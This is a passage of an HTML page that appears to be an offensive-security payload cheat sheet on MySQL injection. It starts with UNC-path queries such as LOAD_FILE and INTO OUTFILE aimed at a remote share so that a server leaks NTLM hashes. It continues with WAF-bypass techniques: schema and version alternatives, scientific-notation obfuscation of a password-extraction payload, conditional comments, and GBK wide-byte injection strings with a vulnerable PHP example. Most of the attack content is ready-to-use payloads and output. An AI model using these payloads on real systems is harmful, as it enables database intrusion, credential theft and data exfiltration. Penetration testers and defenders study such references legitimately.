<h3 id="unc-path-ntlm-hash-stealing">UNC Path - NTLM Hash Stealing</h3>
<p>The term "UNC path" refers to the Universal Naming Convention path used to specify the location of resources such as shared files or devices on a network. It is commonly used in Windows environments to access files over a network using a format like <code>\\server\share\file</code>.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-50-1" name="__codelineno-50-1" href="#__codelineno-50-1"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">LOAD_FILE</span><span class="p">(</span><span class="s1">&#39;\\\\error\\abc&#39;</span><span class="p">);</span>
<a id="__codelineno-50-2" name="__codelineno-50-2" href="#__codelineno-50-2"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">LOAD_FILE</span><span class="p">(</span><span class="mi">0</span><span class="n">x5c5c5c5c6572726f725c5c616263</span><span class="p">);</span>
<a id="__codelineno-50-3" name="__codelineno-50-3" href="#__codelineno-50-3"></a><span class="k">SELECT</span><span class="w"> </span><span class="s1">&#39;&#39;</span><span class="w"> </span><span class="k">INTO</span><span class="w"> </span><span class="n">DUMPFILE</span><span class="w"> </span><span class="s1">&#39;\\\\error\\abc&#39;</span><span class="p">;</span>
<a id="__codelineno-50-4" name="__codelineno-50-4" href="#__codelineno-50-4"></a><span class="k">SELECT</span><span class="w"> </span><span class="s1">&#39;&#39;</span><span class="w"> </span><span class="k">INTO</span><span class="w"> </span><span class="n">OUTFILE</span><span class="w"> </span><span class="s1">&#39;\\\\error\\abc&#39;</span><span class="p">;</span>
<a id="__codelineno-50-5" name="__codelineno-50-5" href="#__codelineno-50-5"></a><span class="k">LOAD</span><span class="w"> </span><span class="k">DATA</span><span class="w"> </span><span class="n">INFILE</span><span class="w"> </span><span class="s1">&#39;\\\\error\\abc&#39;</span><span class="w"> </span><span class="k">INTO</span><span class="w"> </span><span class="k">TABLE</span><span class="w"> </span><span class="k">DATABASE</span><span class="p">.</span><span class="k">TABLE_NAME</span><span class="p">;</span>
</code></pre></div>
<p><img alt="⚠" class="twemoji" src="https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.1.0/assets/svg/26a0.svg" title=":warning:" /> Don't forget to escape the '\\'.</p>
<h2 id="mysql-waf-bypass">MYSQL WAF Bypass</h2>
<h3 id="alternative-to-information-schema">Alternative to Information Schema</h3>
<p><code>information_schema.tables</code> alternative</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-51-1" name="__codelineno-51-1" href="#__codelineno-51-1"></a><span class="k">SELECT</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">mysql</span><span class="p">.</span><span class="n">innodb_table_stats</span><span class="p">;</span>
<a id="__codelineno-51-2" name="__codelineno-51-2" href="#__codelineno-51-2"></a><span class="o">+</span><span class="c1">----------------+-----------------------+---------------------+--------+----------------------+--------------------------+</span>
<a id="__codelineno-51-3" name="__codelineno-51-3" href="#__codelineno-51-3"></a><span class="o">|</span><span class="w"> </span><span class="n">database_name</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="k">table_name</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">last_update</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">n_rows</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">clustered_index_size</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">sum_of_other_index_sizes</span><span class="w"> </span><span class="o">|</span>
<a id="__codelineno-51-4" name="__codelineno-51-4" href="#__codelineno-51-4"></a><span class="o">+</span><span class="c1">----------------+-----------------------+---------------------+--------+----------------------+--------------------------+</span>
<a id="__codelineno-51-5" name="__codelineno-51-5" href="#__codelineno-51-5"></a><span class="o">|</span><span class="w"> </span><span class="n">dvwa</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">guestbook</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="mi">2017</span><span class="o">-</span><span class="mi">01</span><span class="o">-</span><span class="mi">19</span><span class="w"> </span><span class="mi">21</span><span class="p">:</span><span class="mi">02</span><span class="p">:</span><span class="mi">57</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="mi">1</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="o">|</span>
<a id="__codelineno-51-6" name="__codelineno-51-6" href="#__codelineno-51-6"></a><span class="o">|</span><span class="w"> </span><span class="n">dvwa</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">users</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="mi">2017</span><span class="o">-</span><span class="mi">01</span><span class="o">-</span><span class="mi">19</span><span class="w"> </span><span class="mi">21</span><span class="p">:</span><span class="mi">03</span><span class="p">:</span><span class="mi">07</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="mi">5</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="mi">1</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="o">|</span>
<a id="__codelineno-51-7" name="__codelineno-51-7" href="#__codelineno-51-7"></a><span class="p">...</span>
<a id="__codelineno-51-8" name="__codelineno-51-8" href="#__codelineno-51-8"></a><span class="o">+</span><span class="c1">----------------+-----------------------+---------------------+--------+----------------------+--------------------------+</span>
<a id="__codelineno-51-9" name="__codelineno-51-9" href="#__codelineno-51-9"></a>
<a id="__codelineno-51-10" name="__codelineno-51-10" href="#__codelineno-51-10"></a><span class="n">mysql</span><span class="o">&gt;</span><span class="w"> </span><span class="k">SHOW</span><span class="w"> </span><span class="n">TABLES</span><span class="w"> </span><span class="k">IN</span><span class="w"> </span><span class="n">dvwa</span><span class="p">;</span>
<a id="__codelineno-51-11" name="__codelineno-51-11" href="#__codelineno-51-11"></a><span class="o">+</span><span class="c1">----------------+</span>
<a id="__codelineno-51-12" name="__codelineno-51-12" href="#__codelineno-51-12"></a><span class="o">|</span><span class="w"> </span><span class="n">Tables_in_dvwa</span><span class="w"> </span><span class="o">|</span>
<a id="__codelineno-51-13" name="__codelineno-51-13" href="#__codelineno-51-13"></a><span class="o">+</span><span class="c1">----------------+</span>
<a id="__codelineno-51-14" name="__codelineno-51-14" href="#__codelineno-51-14"></a><span class="o">|</span><span class="w"> </span><span class="n">guestbook</span><span class="w"> </span><span class="o">|</span>
<a id="__codelineno-51-15" name="__codelineno-51-15" href="#__codelineno-51-15"></a><span class="o">|</span><span class="w"> </span><span class="n">users</span><span class="w"> </span><span class="o">|</span>
<a id="__codelineno-51-16" name="__codelineno-51-16" href="#__codelineno-51-16"></a><span class="o">+</span><span class="c1">----------------+</span>
</code></pre></div>
<h3 id="alternative-to-version">Alternative to VERSION</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-52-1" name="__codelineno-52-1" href="#__codelineno-52-1"></a><span class="n">mysql</span><span class="o">&gt;</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="o">@@</span><span class="n">innodb_version</span><span class="p">;</span>
<a id="__codelineno-52-2" name="__codelineno-52-2" href="#__codelineno-52-2"></a><span class="o">+</span><span class="c1">------------------+</span>
<a id="__codelineno-52-3" name="__codelineno-52-3" href="#__codelineno-52-3"></a><span class="o">|</span><span class="w"> </span><span class="o">@@</span><span class="n">innodb_version</span><span class="w"> </span><span class="o">|</span>
<a id="__codelineno-52-4" name="__codelineno-52-4" href="#__codelineno-52-4"></a><span class="o">+</span><span class="c1">------------------+</span>
<a id="__codelineno-52-5" name="__codelineno-52-5" href="#__codelineno-52-5"></a><span class="o">|</span><span class="w"> </span><span class="mi">5</span><span class="p">.</span><span class="mi">6</span><span class="p">.</span><span class="mi">31</span><span class="w"> </span><span class="o">|</span>
<a id="__codelineno-52-6" name="__codelineno-52-6" href="#__codelineno-52-6"></a><span class="o">+</span><span class="c1">------------------+</span>
<a id="__codelineno-52-7" name="__codelineno-52-7" href="#__codelineno-52-7"></a>
<a id="__codelineno-52-8" name="__codelineno-52-8" href="#__codelineno-52-8"></a><span class="n">mysql</span><span class="o">&gt;</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="o">@@</span><span class="k">version</span><span class="p">;</span>
<a id="__codelineno-52-9" name="__codelineno-52-9" href="#__codelineno-52-9"></a><span class="o">+</span><span class="c1">-------------------------+</span>
<a id="__codelineno-52-10" name="__codelineno-52-10" href="#__codelineno-52-10"></a><span class="o">|</span><span class="w"> </span><span class="o">@@</span><span class="k">version</span><span class="w"> </span><span class="o">|</span>
<a id="__codelineno-52-11" name="__codelineno-52-11" href="#__codelineno-52-11"></a><span class="o">+</span><span class="c1">-------------------------+</span>
<a id="__codelineno-52-12" name="__codelineno-52-12" href="#__codelineno-52-12"></a><span class="o">|</span><span class="w"> </span><span class="mi">5</span><span class="p">.</span><span class="mi">6</span><span class="p">.</span><span class="mi">31</span><span class="o">-</span><span class="mi">0</span><span class="n">ubuntu0</span><span class="p">.</span><span class="mi">15</span><span class="p">.</span><span class="mi">10</span><span class="p">.</span><span class="mi">1</span><span class="w"> </span><span class="o">|</span>
<a id="__codelineno-52-13" name="__codelineno-52-13" href="#__codelineno-52-13"></a><span class="o">+</span><span class="c1">-------------------------+</span>
<a id="__codelineno-52-14" name="__codelineno-52-14" href="#__codelineno-52-14"></a>
<a id="__codelineno-52-15" name="__codelineno-52-15" href="#__codelineno-52-15"></a><span class="n">mysql</span><span class="o">&gt;</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="k">version</span><span class="p">();</span>
<a id="__codelineno-52-16" name="__codelineno-52-16" href="#__codelineno-52-16"></a><span class="o">+</span><span class="c1">-------------------------+</span>
<a id="__codelineno-52-17" name="__codelineno-52-17" href="#__codelineno-52-17"></a><span class="o">|</span><span class="w"> </span><span class="k">version</span><span class="p">()</span><span class="w"> </span><span class="o">|</span>
<a id="__codelineno-52-18" name="__codelineno-52-18" href="#__codelineno-52-18"></a><span class="o">+</span><span class="c1">-------------------------+</span>
<a id="__codelineno-52-19" name="__codelineno-52-19" href="#__codelineno-52-19"></a><span class="o">|</span><span class="w"> </span><span class="mi">5</span><span class="p">.</span><span class="mi">6</span><span class="p">.</span><span class="mi">31</span><span class="o">-</span><span class="mi">0</span><span class="n">ubuntu0</span><span class="p">.</span><span class="mi">15</span><span class="p">.</span><span class="mi">10</span><span class="p">.</span><span class="mi">1</span><span class="w"> </span><span class="o">|</span>
<a id="__codelineno-52-20" name="__codelineno-52-20" href="#__codelineno-52-20"></a><span class="o">+</span><span class="c1">-------------------------+</span>
<a id="__codelineno-52-21" name="__codelineno-52-21" href="#__codelineno-52-21"></a>
<a id="__codelineno-52-22" name="__codelineno-52-22" href="#__codelineno-52-22"></a><span class="n">mysql</span><span class="o">&gt;</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="o">@@</span><span class="k">GLOBAL</span><span class="p">.</span><span class="k">VERSION</span><span class="p">;</span>
<a id="__codelineno-52-23" name="__codelineno-52-23" href="#__codelineno-52-23"></a><span class="o">+</span><span class="c1">------------------+</span>
<a id="__codelineno-52-24" name="__codelineno-52-24" href="#__codelineno-52-24"></a><span class="o">|</span><span class="w"> </span><span class="o">@@</span><span class="k">GLOBAL</span><span class="p">.</span><span class="k">VERSION</span><span class="w"> </span><span class="o">|</span>
<a id="__codelineno-52-25" name="__codelineno-52-25" href="#__codelineno-52-25"></a><span class="o">+</span><span class="c1">------------------+</span>
<a id="__codelineno-52-26" name="__codelineno-52-26" href="#__codelineno-52-26"></a><span class="o">|</span><span class="w"> </span><span class="mi">8</span><span class="p">.</span><span class="mi">0</span><span class="p">.</span><span class="mi">27</span><span class="w"> </span><span class="o">|</span>
<a id="__codelineno-52-27" name="__codelineno-52-27" href="#__codelineno-52-27"></a><span class="o">+</span><span class="c1">------------------+</span>
</code></pre></div>
<h3 id="alternative-to-group_concat">Alternative to GROUP_CONCAT</h3>
<p>Requirement: <code>MySQL &gt;= 5.7.22</code></p>
<p>Use <code>json_arrayagg()</code> instead of <code>group_concat()</code> which allows less symbols to be displayed</p>
<ul>
<li><code>group_concat()</code> = 1024 symbols</li>
<li><code>json_arrayagg()</code> &gt; 16,000,000 symbols</li>
</ul>
<div class="highlight"><pre><span></span><code><a id="__codelineno-53-1" name="__codelineno-53-1" href="#__codelineno-53-1"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">json_arrayagg</span><span class="p">(</span><span class="n">concat_ws</span><span class="p">(</span><span class="mi">0</span><span class="n">x3a</span><span class="p">,</span><span class="n">table_schema</span><span class="p">,</span><span class="k">table_name</span><span class="p">))</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="n">INFORMATION_SCHEMA</span><span class="p">.</span><span class="n">TABLES</span><span class="p">;</span>
</code></pre></div>
<h3 id="scientific-notation">Scientific Notation</h3>
<p>In MySQL, the e notation is used to represent numbers in scientific notation. It's a way to express very large or very small numbers in a concise format. The e notation consists of a number followed by the letter e and an exponent.
The format is: <code>base 'e' exponent</code>.</p>
<p>For example:</p>
<ul>
<li><code>1e3</code> represents <code>1 x 10^3</code> which is <code>1000</code>. </li>
<li><code>1.5e3</code> represents <code>1.5 x 10^3</code> which is <code>1500</code>. </li>
<li><code>2e-3</code> represents <code>2 x 10^-3</code> which is <code>0.002</code>. </li>
</ul>
<p>The following queries are equivalent:</p>
<ul>
<li><code>SELECT table_name FROM information_schema 1.e.tables</code> </li>
<li><code>SELECT table_name FROM information_schema .tables</code> </li>
</ul>
<p>In the same way, the common payload to bypass authentication <code>' or ''='</code> is equivalent to <code>' or 1.e('')='</code> and <code>1' or 1.e(1) or '1'='1</code>.
This technique can be used to obfuscate queries to bypass WAF, for example: <code>1.e(ascii 1.e(substring(1.e(select password from users limit 1 1.e,1 1.e) 1.e,1 1.e,1 1.e)1.e)1.e) = 70 or'1'='2</code> </p>
<h3 id="conditional-comments">Conditional Comments</h3>
<p>MySQL conditional comments are enclosed within <code>/*! ... */</code> and can include a version number to specify the minimum version of MySQL that should execute the contained code.
The code inside this comment will be executed only if the MySQL version is greater than or equal to the number immediately following the <code>/*!</code>. If the MySQL version is less than the specified number, the code inside the comment will be ignored. </p>
<ul>
<li><code>/*!12345UNION*/</code>: This means that the word UNION will be executed as part of the SQL statement if the MySQL version is 12.345 or higher.</li>
<li><code>/*!31337SELECT*/</code>: Similarly, the word SELECT will be executed if the MySQL version is 31.337 or higher.</li>
</ul>
<p><strong>Examples</strong>: <code>/*!12345UNION*/</code>, <code>/*!31337SELECT*/</code></p>
<h3 id="wide-byte-injection-gbk">Wide Byte Injection (GBK)</h3>
<p>Wide byte injection is a specific type of SQL injection attack that targets applications using multi-byte character sets, like GBK or SJIS. The term "wide byte" refers to character encodings where one character can be represented by more than one byte. This type of injection is particularly relevant when the application and the database interpret multi-byte sequences differently.</p>
<p>The <code>SET NAMES gbk</code> query can be exploited in a charset-based SQL injection attack. When the character set is set to GBK, certain multibyte characters can be used to bypass the escaping mechanism and inject malicious SQL code.</p>
<p>Several characters can be used to triger the injection.</p>
<ul>
<li><code>%bf%27</code>: This is a URL-encoded representation of the byte sequence <code>0xbf27</code>. In the GBK character set, <code>0xbf27</code> decodes to a valid multibyte character followed by a single quote ('). When MySQL encounters this sequence, it interprets it as a single valid GBK character followed by a single quote, effectively ending the string.</li>
<li><code>%bf%5c</code>: Represents the byte sequence <code>0xbf5c</code>. In GBK, this decodes to a valid multi-byte character followed by a backslash (<code>\</code>). This can be used to escape the next character in the sequence.</li>
<li><code>%a1%27</code>: Represents the byte sequence <code>0xa127</code>. In GBK, this decodes to a valid multi-byte character followed by a single quote (<code>'</code>).</li>
</ul>
<p>A lot of payloads can be created such as:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-54-1" name="__codelineno-54-1" href="#__codelineno-54-1"></a><span class="o">%</span><span class="n">A8</span><span class="o">%</span><span class="mi">27</span><span class="w"> </span><span class="k">OR</span><span class="w"> </span><span class="mi">1</span><span class="o">=</span><span class="mi">1</span><span class="p">;</span><span class="c1">--</span>
<a id="__codelineno-54-2" name="__codelineno-54-2" href="#__codelineno-54-2"></a><span class="o">%</span><span class="mi">8</span><span class="k">C</span><span class="o">%</span><span class="n">A8</span><span class="o">%</span><span class="mi">27</span><span class="w"> </span><span class="k">OR</span><span class="w"> </span><span class="mi">1</span><span class="o">=</span><span class="mi">1</span><span class="c1">--</span>
<a id="__codelineno-54-3" name="__codelineno-54-3" href="#__codelineno-54-3"></a><span class="o">%</span><span class="n">bf</span><span class="err">&#39;</span><span class="w"> </span><span class="k">OR</span><span class="w"> </span><span class="mi">1</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="c1">-- --</span>
</code></pre></div>
<p>Here is a PHP example using GBK encoding and filtering the user input to escape backslash, single and double quote.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-55-1" name="__codelineno-55-1" href="#__codelineno-55-1"></a><span class="x">function check_addslashes($string)</span>
<a id="__codelineno-55-2" name="__codelineno-55-2" href="#__codelineno-55-2"></a><span class="x">{</span>
<a id="__codelineno-55-3" name="__codelineno-55-3" href="#__codelineno-55-3"></a><span class="x"> $string = preg_replace(&#39;/&#39;. preg_quote(&#39;\\&#39;) .&#39;/&#39;, &quot;\\\\\\&quot;, $string); //escape any backslash</span>
<a id="__codelineno-55-4" name="__codelineno-55-4" href="#__codelineno-55-4"></a><span class="x"> $string = preg_replace(&#39;/\&#39;/i&#39;, &#39;\\\&#39;&#39;, $string); //escape single quote with a backslash</span>
<a id="__codelineno-55-5" name="__codelineno-55-5" href="#__codelineno-55-5"></a><span class="x"> $string = preg_replace(&#39;/\&quot;/&#39;, &quot;\\\&quot;&quot;, $string); //escape double quote with a backslash</span>
<a id="__codelineno-55-6" name="__codelineno-55-6" href="#__codelineno-55-6"></a>
<a id="__codelineno-55-7" name="__codelineno-55-7" href="#__codelineno-55-7"></a><span class="x"> return $string;</span>
<a id="__codelineno-55-8" name="__codelineno-55-8" href="#__codelineno-55-8"></a><span class="x">}</span>
<a id="__codelineno-55-9" name="__codelineno-55-9" href="#__codelineno-55-9"></a>
<a id="__codelineno-55-10" name="__codelineno-55-10" href="#__codelineno-55-10"></a><span class="x">$id=check_addslashes($_GET[&#39;id&#39;]);</span>
<a id="__codelineno-55-11" name="__codelineno-55-11" href="#__codelineno-55-11"></a><span class="x">mysql_query(&quot;SET NAMES gbk&quot;);</span>
<a id="__codelineno-55-12" name="__codelineno-55-12" href="#__codelineno-55-12"></a><span class="x">$sql=&quot;SELECT * FROM users WHERE id=&#39;$id&#39; LIMIT 0,1&quot;;</span>
<a id="__codelineno-55-13" name="__codelineno-55-13" href="#__codelineno-55-13"></a><span class="x">print_r(mysql_error());</span>
</code></pre></div>
<p>Here's a breakdown of how the wide byte injection works:</p>
<p>For instance, if the input is <code>?id=1'</code>, PHP will add a backslash, resulting in the SQL query: <code>SELECT * FROM users WHERE id='1\'' LIMIT 0,1</code>.</p>
<p>However, when the sequence <code>%df</code> is introduced before the single quote, as in <code>?id=1%df'</code>, PHP still adds the backslash. This results in the SQL query: <code>SELECT * FROM users WHERE id='1%df\'' LIMIT 0,1</code>. </p>
<p>In the GBK character set, the sequence <code>%df%5c</code> translates to the character <code></code>. So, the SQL query becomes: <code>SELECT * FROM users WHERE id='1連'' LIMIT 0,1</code>. Here, the wide byte character <code></code> effectively "eating" the added escape charactr, allowing for SQL injection.</p>
<p>Therefore, by using the payload <code>?id=1%df' and 1=1 --+</code>, after PHP adds the backslash, the SQL query transforms into: <code>SELECT * FROM users WHERE id='1連' and 1=1 --+' LIMIT 0,1</code>. This altered query can be successfully injected, bypassing the intended SQL logic.</p>
<h2 id="references">References</h2>
<ul>
<li><a href="https://blog.redforce.io/sqli-extracting-data-without-knowing-columns-names/">[SQLi] Extracting data without knowing columns names - Ahmed Sultan - February 9, 2019</a></li>
<li><a href="https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/">A Scientific Notation Bug in MySQL left AWS WAF Clients Vulnerable to SQL Injection - Marc Olivier Bergeron - October 19, 2021</a></li>
<li><a href="https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/">Alternative for Information_Schema.Tables in MySQL - Osanda Malith Jayathissa - February 3, 2017</a></li>
<li><a href="https://github.com/p4-team/ctf/tree/master/2016-10-26-ekoparty/web_100">Ekoparty CTF 2016 (Web 100) - p4-team - October 26, 2016</a></li>
<li><a href="https://sqlwiki.netspi.com/injectionTypes/errorBased">Error Based Injection | NetSPI SQL Injection Wiki - NetSPI - February 15, 2021</a></li>
<li><a href="https://www.ipa.go.jp/security/vuln/ps6vr70000011hc4-att/000017321.pdf">How to Use SQL Calls to Secure Your Web Site - IPA ISEC - March 2010</a></li>
<li><a href="https://www.exploit-db.com/docs/english/41273-mysql-out-of-band-hacking.pdf">MySQL Out of Band Hacking - Osanda Malith Jayathissa - February 23, 2018</a></li>
<li><a href="https://resources.infosecinstitute.com/sql-truncation-attack/">SQL Truncation Attack - Rohit Shaw - June 29, 2014</a></li>
<li><a href="https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/">SQLi filter evasion cheat sheet (MySQL) - Johannes Dahse - December 4, 2010</a></li>
<li><a href="https://websec.ca/kb/sql_injection#MySQL_Default_Databases">The SQL Injection Knowledge Base - Roberto Salgado - May 29, 2013</a></li>
</ul>
<aside class="md-source-file">
<span class="md-source-file__fact">
<span class="md-icon" title="Last update">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M21 13.1c-.1 0-.3.1-.4.2l-1 1 2.1 2.1 1-1c.2-.2.2-.6 0-.8l-1.3-1.3c-.1-.1-.2-.2-.4-.2m-1.9 1.8-6.1 6V23h2.1l6.1-6.1zM12.5 7v5.2l4 2.4-1 1L11 13V7zM11 21.9c-5.1-.5-9-4.8-9-9.9C2 6.5 6.5 2 12 2c5.3 0 9.6 4.1 10 9.3-.3-.1-.6-.2-1-.2s-.7.1-1 .2C19.6 7.2 16.2 4 12 4c-4.4 0-8 3.6-8 8 0 4.1 3.1 7.5 7.1 7.9l-.1.2z"/></svg>
</span>
<span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-date">January 14, 2025</span>
</span>
</aside>
<div class="social-container">
<b>Share this content</b>
<div class="a2a_kit a2a_kit_size_32 a2a_default_style">
<a class="a2a_dd" href="https://www.addtoany.com/share"></a>
<a class="a2a_button_x"></a>
<a class="a2a_button_telegram"></a>
<a class="a2a_button_linkedin"></a>
<a class="a2a_button_email"></a>
<a class="a2a_button_microsoft_teams"></a>
</div>
<br>
<script async src="https://static.addtoany.com/menu/page.js"></script>
<script defer src="https://cloud.umami.is/script.js" data-website-id="82be5164-e1f3-4cb0-bd22-20e02086d3d4"></script>
</div>
</article>
</div>
<script>var target=document.getElementById(location.hash.slice(1));target&&target.name&&(target.checked=target.name.startsWith("__tabbed_"))</script>
</div>
<button type="button" class="md-top md-icon" data-md-component="top" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M13 20h-2V8l-5.5 5.5-1.42-1.42L12 4.16l7.92 7.92-1.42 1.42L13 8z"/></svg>
Back to top
</button>
</main>
<footer class="md-footer">
<div class="md-footer-meta md-typeset">
<div class="md-footer-meta__inner md-grid">
<div class="md-copyright">
Made with
<a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
Material for MkDocs
</a>
</div>
</div>
</div>
</footer>
</div>
<div class="md-dialog" data-md-component="dialog">
<div class="md-dialog__inner md-typeset"></div>
</div>
<script id="__config" type="application/json">{"base": "../..", "features": ["content.code.copy", "content.action.edit", "content.action.view", "content.tooltips", "navigation.tracking", "navigation.top", "search.share", "search.suggest"], "search": "../../assets/javascripts/workers/search.6ce7567c.min.js", "translations": {"clipboard.copied": "Copied to clipboard", "clipboard.copy": "Copy to clipboard", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.placeholder": "Type to start searching", "search.result.term.missing": "Missing", "select.version": "Select version"}}</script>
<script src="../../assets/javascripts/bundle.88dd0f4e.min.js"></script>
</body>
</html>